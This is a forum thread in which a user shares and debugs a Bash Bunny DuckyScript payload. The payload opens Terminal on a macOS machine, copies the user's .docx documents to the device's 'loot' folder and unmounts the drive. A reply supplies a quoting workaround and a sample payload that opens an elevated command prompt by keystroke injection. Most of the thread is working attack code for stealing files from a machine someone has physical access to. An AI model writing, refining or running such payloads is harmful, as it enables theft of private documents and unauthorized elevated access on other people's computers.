Jump to content

OSX exfil script


aaaaaaaa
 Share

Recommended Posts

Hello,

I am working on a script to copy document files from an OSX user's documents directory, and there seems to be an issue with text encoding of my copy command.

The script is suppose to open a terminal, copy 20 seconds worth of docx files from the users ./Documents directory to /Volumes/BashBunny/loot directory, then close the terminal, unmount the drive, then make the led green. I created the loot dir on the root of the bunny ahead of time. The line that is having trouble is here"

QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;

Here is the terminal output from when the bunny runs this line:

find ./Documents -iname *.docx -exec cp {} /Volumes/BashBunny/loot ;

find: -exec: no terminating ";" or "+"

The bunny seems to be stripping quotes and backslashes. I have tried to use similar bash commands with other special characters, but I also seem to have the same issue with pipes. I rewrote everything just having the bunny call a bash script. I had no issues using that approach, but I want to get it working in duckyscript and not rely on additional scripts.

I also noticed when trying to access directories using ~/, the bunny changed my text to /root, although the username on the target system that was executing the payload was not root. Reading through the duckyscript and bashbunny wikis do not seem to mention any of this substitution, unless I am colpeltely missing it...

Thanks!

LED R

ATTACKMODE HID STORAGE

source bunny_helpers.sh

LED B

QUACK DELAY 1000

QUACK COMMAND SPACE

QUACK DELAY 800

QUACK STRING Terminal

QUACK DELAY 500

QUACK ENTER

QUACK DELAY 500

QUACK ENTER

QUACK DELAY 500

QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;

QUACK ENTER

QUACK DELAY 10000

QUACK DELAY 10000

QUACK COMMAND q

QUACK DELAY 500

QUACK ENTER

QUACK COMMAND SPACE

QUACK DELAY 800

QUACK STRING Terminal

QUACK DELAY 800

QUACK ENTER

QUACK STRING diskutil unmount /Volumes/BashBunny

QUACK DELAY 500

QUACK ENTER

QUACK DELAY 500

QUACK COMMAND q

QUACK DELAY 500

QUACK ENTER

LED G

 

Link to comment
Share on other sites

Hey!

Its important to remember that the payloads appear to be running in the context of a bash terminal on the bashbunny (hence the name)

So! Something I have run into is bash terminal enterprising QUACK or Q statements, such as / or cd ~/ or even quotations

A really easy way to get around this is to place all the "DuckyScript" into txt file such as part1.txt and use QUACK switch2/part1.txt

Example payload.txt:

#!/bin/bash
LED R 500
ATTACKMODE HID STORAGE
QUACK switch2/kickOff.txt
LED G


Example kickOff.txt:

GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 100
STRING HelloWorld!
ENTER

Let me know if i can help anymore!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...